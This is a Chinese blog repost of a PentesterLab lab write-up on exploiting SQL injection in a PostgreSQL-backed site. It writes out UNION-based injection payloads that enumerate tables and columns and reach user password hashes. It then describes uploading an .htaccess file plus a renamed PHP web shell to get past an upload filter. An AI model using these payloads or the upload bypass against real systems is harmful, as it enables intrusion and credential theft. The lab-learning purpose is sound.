from injection shell sql to_FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

最新推荐文章于 2021-03-08 09:59:59 发布
最新推荐文章于 2021-03-08 09:59:59 发布
阅读量69 收藏
点赞数
文章标签: from injection shell sql to
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42354108/article/details/113026125
版权

FROM SQL INJECTION TO SHELL:

POSTGRESQL EDITION

这里先介绍一下POSTGRESQL。这是一款数据库管理系统,与oracle是同类型软件。08年左右的市场占有率为8%。

cecc603150bf4be1f63c894ade47477e.png

上图为ITPUB社区开源数据库使用状况调查

探测SQL注入

本关可以说是FROM SQL INJECTION TO SHELL 这关的延续。建议先通过之前的关。

这关基本上和FROM SQL INJECTION TO SHELL是类似的。共同的部分就不再介绍了。

这关的错误代码发生了变化

b427ef3eb596922b19f2dcfc750acd8b.png

利用SQL注入

攻击方法还是用UNION和ORDER BY两种

SELECT id,name,price FROM

articles where id=1 UNION SELECT 1

SELECT id,name,price FROM

articles where id=1 UNION SELECT1,2

SELECT id,name,price FROM

articles where id=1 UNION SELECT 1,2,3

这里三种情况都有报错,但第三种情况报的错会不同。报错提示是数据类型不匹配。

5ee0fa0936d493eb29d6daf541be8751.png

再试试ORDER BY。这里很容易试出字段数量。超出查询字段数量,提示如下

ea1463a7b79282e41e7b89323b424c01.png

检索信息

从上一步的UNION我们看到提示是数据类型不匹配,把数字改变成null试下。

1 UNION SELECT

‘aaaa‘,null,null,null

结果没有报错

我们再尝试下面几种情况

1 UNION SELECT ‘aaaa‘,null,null,null

1 UNION SELECT null,‘aaaa‘,null,null

1 union select

null,null,‘aaaa‘,null

1 union select

null,null,null,‘aaaa‘

发现第2和3

个没有报错,第1,4报数据类型不匹配。如果查看网页的HTML,会发现‘aaaa‘存在于

1ac9ab300c17063241aaa450935057ec.png

我们采用第2个进行构建语句,查询version(),current_user,current_database()

我注意到这里的函数与上一关的略有点不同,上一关的是version(),current_user(),current_database()

这是因为上一关的数据库是MYSQL。

接下来,我们尝试获取当前数据库的表名和字段。方法和MYSQL的类似。POSTGRESQL也有一个meta-information数据库,我们可以构建语句查询

查询表名:SELECT tablename FROM pg_tables

查询所有字段:

SELECT column_name FROM

information_schema.columns

结合到实例中:

1 UNION SELECT

null,tablename,null,null FROM pg_tables

1 UNION SELECT

null,column_name,null,null FROM information_schema.columns

同时取得字段和对应的表名

1 UNION SELECT null,

table_name, column_name,null,null FROM information_schema.columns

1 UNION SELECT

null,table_name||‘:‘|| column_name,null,null FROM information_schema.columns.

上一关是用contact函数,而这个数据库不能用。

从结果中找到用户表USERS和它的字段

33ddc57440566380df8f60f8be7da647.png

查出密码再解密还原。

登陆账号,注入文件

这里开始是本关的难点。

上一关用.php3就混过关, 这次又被过滤了。经尝试,只要带php的,统统被过滤。

这次要引入 .htaccess文件

这个文件很多妙用,它与windows的autorun.inf有点类似。请查看百度百科

htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法,

即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,

以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

.htaccess文件的内容如下,意思是增加一种php模块执行的后缀。blah后缀不太可能被过滤掉。

da0400e6d4c1c553bf64d18d2b679324.png

特别注意下".htaccess"不是后缀,在windows图形界面下是难重命名成这个名字,需要DOS下改。

23cde8805f42be7f993fd585234a1744.png

再把shell.php3更名为shell.blah,上传这两个到服务器。神奇的事就发生了。

3dc4c10a4a5aadc6caab9348bf865186.png

原文:http://www.cnblogs.com/pentesterlab-beginner/p/3644398.html

AyeNay Rats
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
From SQL Injection to Shell学习笔记
06-08
pentesterlab的From SQL Injection to Shell模块学习经验
how-to-postgresqlSQL示例集合
02-13
PostgreSQL数据库SQL示例的集合。 一般命令 connect : psql --host localhost --user postgres 数据库 列出数据库: postgres=# \l 连接到数据库: postgres=# \c pandi 选择数据库大小: select pg_size_pretty...
PentesterLab-From SQL Injection to Shell
weixin_30530339的博客
09-14 194
一、打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这里出现了一个id,常规思路这个位置可能有sql注入。然后看其他链接,都差不多,直到点到Admin的链接时,出来一个后台。 二、SQL注入先行 既然有id=1,首先看下这个id是字符还是数字,后面加一个 ' 号,出现了Mysql的报...
PentesterLab-From SQL Injection to Shell: PostgreSQL edition
weixin_30731305的博客
09-18 193
一、打开页面,随便点了几下,返现和From SQL Injection to Shell差不多,直奔主题开始注入   由于PostgreSQL与MySQL不同,几个关注点需要注意下 二、order by下看看有几个字段 /cat.php?id=1%20order%20by%204 #order by 4正常,5出现报错,说明有4个字段 三、查看注入点在什么位置,...
[SQL注入1]From SQL injection to Shell
weixin_30268071的博客
04-03 152
第一次写,希望大神们多指点。 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习。网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTERLAB,网址如下:http://www.pentesterlab.com/ 刚开始学,我碰到很多困难,如对数据库不够熟悉,对PHP不熟悉,对各种大神的工具不熟悉。积沙成塔,滴水穿石,我们一步一步...
[Pentester Lab]From SQL Injection to Shell
CD的博客
04-07 644
本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。 By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333 1. 介绍 实验目的: 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行...
sql_exporter:适用于Prometheus的灵活SQL导出器
01-30
Prometheus SQL导出器 该存储库包含一个服务,该服务以灵活的时间间隔运行用户定义SQL查询,并通过HTTP导出结果指标以供Prometheus使用。 状态 在生产中积极与PostgreSQL一起使用。 我们最终希望支持所有可以使用...
psqlplus:PsqlPlus为postgresql提供了常见的操作和维护sql
04-27
PsqlPlus为postgresql提供了常见的操作和维护sql,并支持用户定义的选项。 不会更改任何服务器文件的PsqlPlus被实现为psql的扩展。 它易于安装和使用。 SQL是从Internet收集的,其中大多数是从中收集。 每个src / ...
pg-bump:PostgreSQL极简SQL迁移CLI
05-05
pg-bump 一个自以为是的,极简的PostgreSQL SQL迁移CLI。它是什么? pg-bump提供对“ Plain SQL”中编写的PostgreSQL数据库模式迁移的命令行管理。 假定a)您正在以及b)您正在。 pg-bump主要用于的可执行文件。 ...
PostgreSQL教程(十九):SQL语言函数
09-10
PostgreSQL中,SQL语言函数是数据库操作的重要组成部分,它们允许开发者封装复杂的SQL逻辑,并以更简洁、可重用的方式执行。本教程将深入探讨SQL语言函数的基本概念、基本类型、复合类型以及带输出参数的函数,...
PostgreSQL获取表信息和字段信息
Evan's Blog ٩(๑❛ᴗ❛๑)۶
09-05 5089
最近用到了postgreSQL查询当前表下的所有字段信息,在此总结一下查询SQL。 注:查询SQL中的tablename需替换成你需要查询的表名。 1.获取数据库中所有table名: SELECT tablename FROM pg_tables WHERE tablename NOT LIKE 'pg%' AND tablename NOT LIK...
From SQL injection to shell II
cnbird's blog
06-20 1273
https://pentesterlab.com/from_sqli_to_shell_II.html
python获取PostgreSQL数据库的所有表名、表字段信息
积跬步,慕至千里的博客
03-08 5345
目录一、需求问题需求一:获取所有表名需求二:获取表的字段信息二、问题解决办法2.1 python连接postgres数据库的方法 一、需求问题 需求一:获取所有表名 在mysql数据库中,我们想获取某个库下的所有表名时,只需要使用命令: show tables; 但是,在PostgreSQL数据库时,是不通用的。 需求二:获取表的字段信息 类同需求一,我们想获取表含有的哪些字段信息,又如何实现呢? 在mysql中,只需要使用命令: SHOW FULL COLUMNS FROM tbl_name [FR
Python项目开发实战:影视作品分析小程序,案例教程编程实例课程详解.pdf
最新发布
07-05
Python项目开发实战:影视作品分析小程序,案例教程编程实例课程详解.pdf
hive外部表使用语句
07-05
hive外部表使用语句
Lab-1-Intro-to-ROS.pdf
07-05
ROS
SVM(支持向量机)案例&项目源码
07-05
SVM(支持向量机)案例&项目源码
scikit_learn-1.4.2-cp310-cp310-macosx_10_9_x86_64.whl
07-05
该资源为scikit_learn-1.4.2-cp310-cp310-macosx_10_9_x86_64.whl,欢迎下载使用哦!
场景化落地应用推进制造企业数字化转型.pptx
07-05
场景化落地应用推进制造企业数字化转型.pptx
PG基础入门SQL部分
06-27
本文是对PG基础入门SQL部分和PostgreSQL简介的总结。PG基础入门SQL部分重点介绍了PostgreSQL的基础知识和SQL操作,而PostgreSQL简介部分则展示了这一开源关系式数据库管理系统的特点和优势。 首先,PG基础入门SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值